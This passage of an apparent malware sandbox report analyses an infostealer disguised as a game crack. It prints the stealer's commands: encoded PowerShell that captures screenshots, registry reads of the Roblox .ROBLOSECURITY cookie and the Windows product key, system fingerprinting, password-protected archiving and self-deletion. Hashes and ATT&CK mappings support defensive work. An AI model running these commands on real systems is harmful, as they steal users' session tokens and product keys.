AgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3456
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1972
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4q1d1hhd\4q1d1hhd.cmdline"
        6⤵
        
        PID:2988
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAA1B.tmp" "c:\Users\Admin\AppData\Local\Temp\4q1d1hhd\CSC960C66BFE39D463594591B7B2E2E85EE.TMP"
        7⤵
        
        PID:1412
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:4540
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:756
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:1116
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:1284
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:3252
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:3952
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:3620
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:1624
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:1860
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:4020
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:1476
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4680
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "getmac"
      4⤵
      PID:4860
    - - C:\Windows\system32\getmac.exe
        
        getmac
        5⤵
        
        PID:4644
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:5080
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1116
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI40162\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\q0odi.zip" *"
      4⤵
      PID:4112
    - - C:\Users\Admin\AppData\Local\Temp\_MEI40162\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI40162\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\q0odi.zip" *
        5⤵
        Executes dropped EXE
        
        PID:2556
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      4⤵
      PID:1076
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2168
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      4⤵
      PID:1888
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        5⤵
        
        PID:652
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:1916
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:756
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:1860
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
      4⤵
      PID:4416
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3116
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:3204
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:3328
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
      4⤵
      PID:3928
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4572
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Deushack.exe""
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      PID:4868
    - - C:\Windows\system32\PING.EXE
        
        ping localhost -n 3
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2324
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $file='C:\Users\Admin\AppData\Local\Temp\1d0b683cb6c1908c5d54320e4683a66e52cdf7e01bf1f17f652625f58f864fcc.exe';for($i=1;$i -le 600 -and (Test-Path $file -PathType leaf);$i++){Remove-Item $file;Start-Sleep -m 100}
  2⤵
  - Deletes itself
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3536

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
8740e7db6a0d290c198447b1f16d5281

SHA1
ab54460bb918f4af8a651317c8b53a8f6bfb70cd

SHA256
f45b0efc0833020dfeeaad0adc8ed10b0f85e0bc491baf9e1a4da089636bccf5

SHA512
d91fe9666c4923c8e90e5a785db96e5613b8cb3bf28983296a2f381ccdcd73d15254268548e156c8150a9a531712602313ba65f74cec5784341c8d66b088750b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
34572678e82cf736b4c689928f5ff013

SHA1
c631366b42c15e244ed41f8dc9f9131e4eef4a0a

SHA256
5d5230810b633df7b5c3c5534758633427bb65ffa1c7accbc5ad822cd47024dc

SHA512
4269910cfed9df34e1f90168f396ec806e5cd82bad80f819bef0bb6a04b41378f4d6375ec29de908eb7156d044eb70dfdc542de6a0c874a24ab4bd03b162786c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
27f5f4c66338df870bab165504cf6661

SHA1
ea3877b3480b041ca1b4959c9747aff500f7f559

SHA256
e4b7b203767decc674e6a70a78f0666f88afe73b1b532db70bb8247f1b8be120

SHA512
fe77bacbba52f4e97b070027a01388c4cc7d18ebe208dd6ff6e79e6c0537c35c7d4c061f5f2faa71520e7c104af490458de6c3f2aedb0324b0e785cb82b87428

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
bd5940f08d0be56e65e5f2aaf47c538e

SHA1
d7e31b87866e5e383ab5499da64aba50f03e8443

SHA256
2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6

SHA512
c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
9b80cd7a712469a4c45fec564313d9eb

SHA1
6125c01bc10d204ca36ad1110afe714678655f2d

SHA256
5a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d

SHA512
ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b2600662b39ee59512f530131c038b45

SHA1
c417eecbd7fd9c0f143261279c17cdc83783c95c

SHA256
b2cd3884c706629b0e92856ba2643c4062d98480d38a36e4ac10f6a6695ed8c2

SHA512
97bbb9a0859b3e01a5d789b5d242c07b35e8f80a7ccf7e2e9af1ff31cf0a3497cc23603754407140a7602bb1a3edd7ec71529a0b9a7460b700ebcd72306bd3af

Download Submit
C:\Users\Admin\AppData\Local\Temp\4q1d1hhd\4q1d1hhd.dll

Filesize
4KB

MD5
0fb3ab78ef8580679ace831d0eabbfef

SHA1
000f575d48f1c8f09c07a29606e6868edd771b5c

SHA256
5f7dcca7eebdc72ea6431f27d2d08839b639f639ac6ceac3e042983096c84bec

SHA512
de37e0b5cedbd28605e5092969b6096b7bdfd358657f75d2975a7d954b14f4471528379e0205e15b1bd3ce6980b9adc0334f5a937220bdf500ca243e912c0476

Download Submit
C:\Users\Admin\AppData\Local\Temp\Crack.exe

Filesize
43KB

MD5
f3c028ab76f81aebe027ae01513cb25f

SHA1
a74c36c9a75b635fa670c4849a877ba2a86c16a1

SHA256
b1a05960d78ed944e1d752631ee6dffd73a51d54122d44d2d9cca9d18d3fd6a3

SHA512
f5d0fe26c19fae97cbee042adc3507b7d4805ab3cbdfff56506608d1824eb8993da4bb817ab4f4e9d4bd05673ae7a4694c40bc8a08f6db05794632ca316fb504

Download Submit
C:\Users\Admin\AppData\Local\Temp\Deushack.exe

Filesize
6.8MB

MD5
34664a7f49dc5a56c520129cec5d0ae6

SHA1
c3cb6a7fb93c00bc00c35e3f5321bc6084f4f133

SHA256
be2178ff14d3d0cb877a1a6e6f235727388bf3c4d394b97836bce383af658a7b

SHA512
e9a021c59ab5ee073928c575369256bc82067b1196b10ce15acce3a6e280e5ac957cba2692baab117c353c2c4ee30b0cc9352577f91acec59297b59c67f97455

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESAA1B.tmp

Filesize
1KB

MD5
e4de9f6efb5c6d6f3e57925ee1a52d7a

SHA1
b7f2951ea924499b102e7344a9a05ca15106f546

SHA256
58675f7665958f781cb1fc4ea4359b0674f606efda433303b38a5e0ee9629098

SHA512
236859182f1e3e9bb90ff83b7d019e66d7a41a0eb157d98c4f25b30ce291441364bc90b8c28a4c0b2f87945ab2baa0c1cdad7f79de5706b4a3869050cdf79ecb

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40162\VCRUNTIME140.dll

Filesize
106KB

MD5
4585a96cc4eef6aafd5e27ea09147dc6

SHA1
489cfff1b19abbec98fda26ac8958005e88dd0cb

SHA256
a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736

SHA512
d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40162\_bz2.pyd

Filesize
48KB

MD5
554b7b0d0daca993e22b7d31ed498bc2

SHA1
ea7f1823e782d08a99b437c665d86fa734fe3fe4

SHA256
1db14a217c5279c106b9d55f440ccf19f35ef3a580188353b734e3e39099b13f

SHA512
4b36097eddd2c1d69ac98c7e98eebe7bb11a5117249ad36a99883732f643e21ecf58e6bea33b70974d600563dc0b0a30bead98bafb72537f8374b3d67979e60a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40162\_ctypes.pyd

Filesize
58KB

MD5
d603c8bfe4cfc71fe5134d64be2e929b

SHA1
ff27ea58f4f5b11b7eaa1c8884eac658e2e9248b

SHA256
5ee40bcaab13fa9cf064ecae6fc0da6d236120c06fa41602893f1010efaa52fe

SHA512
fcc0dbfbe402300ae47e1cb2469d1f733a910d573328fe7990d69625e933988ecc21ab22f432945a78995129885f4a9392e1cee224d14e940338046f61abe361

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40162\_decimal.pyd

Filesize
106KB

MD5
9cef71be6a40bc2387c383c217d158c7

SHA1
dd6bc79d69fc26e003d23b4e683e3fac21bc29cb

SHA256
677d9993bb887fef60f6657de6c239086ace7725c68853e7636e2ff4a8f0d009

SHA512
90e02054163d44d12c603debdc4213c5a862f609617d78dd29f7fd21a0bae82add4ceaf30024da681c2a65d08a8142c83eb81d8294f1284edfbeeb7d66c371c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40162\_hashlib.pyd

Filesize
35KB

MD5
32df18692606ce984614c7efda2eec27

SHA1
86084e39ab0aadf0ecfb82ce066b7bf14152961e

SHA256
b7c9c540d54ab59c16936e1639c6565cd35a8ca625f31753e57db9cbd0ee0065

SHA512
679f8956370edc4dee32475d8440a2d2f9b6dd0edd0e033e49fed7834a35c7ed51ccde0995d19ed0a559a4383b99ae8c11e4e686902db12a2a5e0a3f2c0f4a9d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40162\_lzma.pyd

Filesize
85KB

MD5
01629284f906c40f480e80104158f31a

SHA1
6ab85c66956856710f32aed6cdae64a60aea5f0f

SHA256
a201ec286b0233644ae62c6e418588243a3f2a0c5a6f556e0d68b3c747020812

SHA512
107a4e857dd78dd92be32911e3a574f861f3425e01ab4b1a7580ac799dc76122ce3165465d24c34ac7fc8f2810547ad72b4d4ba3de76d3d61ed9bf5b92e7f7d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40162\_queue.pyd

Filesize
25KB

MD5
4a313dc23f9d0a1f328c74dd5cf3b9ab

SHA1
494f1f5ead41d41d324c82721ab7ca1d1b72c062

SHA256
2163010bfde88a6cc15380516d31955935e243b7ad43558a89380bf5fe86337e

SHA512
42c712b758b35c0005b3528af586233298c2df4ed9f5133b8469bca9ec421ab151ce63f3929898c73d616cd9707594fa5f96d623fc150e214a4b2276c23c296e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40162\_socket.pyd

Filesize
43KB

MD5
67897f8c3262aecb8c9f15292dd1e1f0

SHA1
74f1ef77dd3265846a504f98f2e2f080eadbf58a

SHA256
ddbfa852e32e20d67a0c3d718ce68e9403c858d5cad44ea6404aff302556aba7

SHA512
200b6570db2fbb2eac7f51cae8e16ffb89cd46d13fba94a7729a675f10f4432fc89a256fd6bd804feac528191bd116407fd58a0573487d905fc8fca022c1abba

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40162\_sqlite3.pyd

Filesize
56KB

MD5
230025cf18b0c20c5f4abba63d733ca8

SHA1
336248fde1973410a0746599e14485d068771e30

SHA256
30a3bc9ed8f36e3065b583d56503b81297f32b4744bff72dcf918407978ce332

SHA512
2c4d943c6587d28763cf7c21ad37cc4762674a75c643994b3e8e7c7b20576d5674cf700fdfaddc1a834d9bf034bf2f449d95351c236fde720505ccdd03369bb1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40162\_ssl.pyd

Filesize
62KB

MD5
0d15b2fdfa03be76917723686e77823c

SHA1
efd799a4a5e4f9d15226584dd2ee03956f37bdaf

SHA256
2fc63abe576c0d5fe031cf7ee0e2f11d9c510c6dbacfc5dd2e79e23da3650ee8

SHA512
e21ab5ebe8b97243cf32ca9181c311978e203852847e4beb5e6ada487038c37dec18a2b683e11e420e05ace014aca2172b2dda15930bab944053843e25623227

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI40162\base_library.zip

Filesize
1.4MB

MD5
5011d68fbea0156fe813d00c1f7d9af2

SHA1
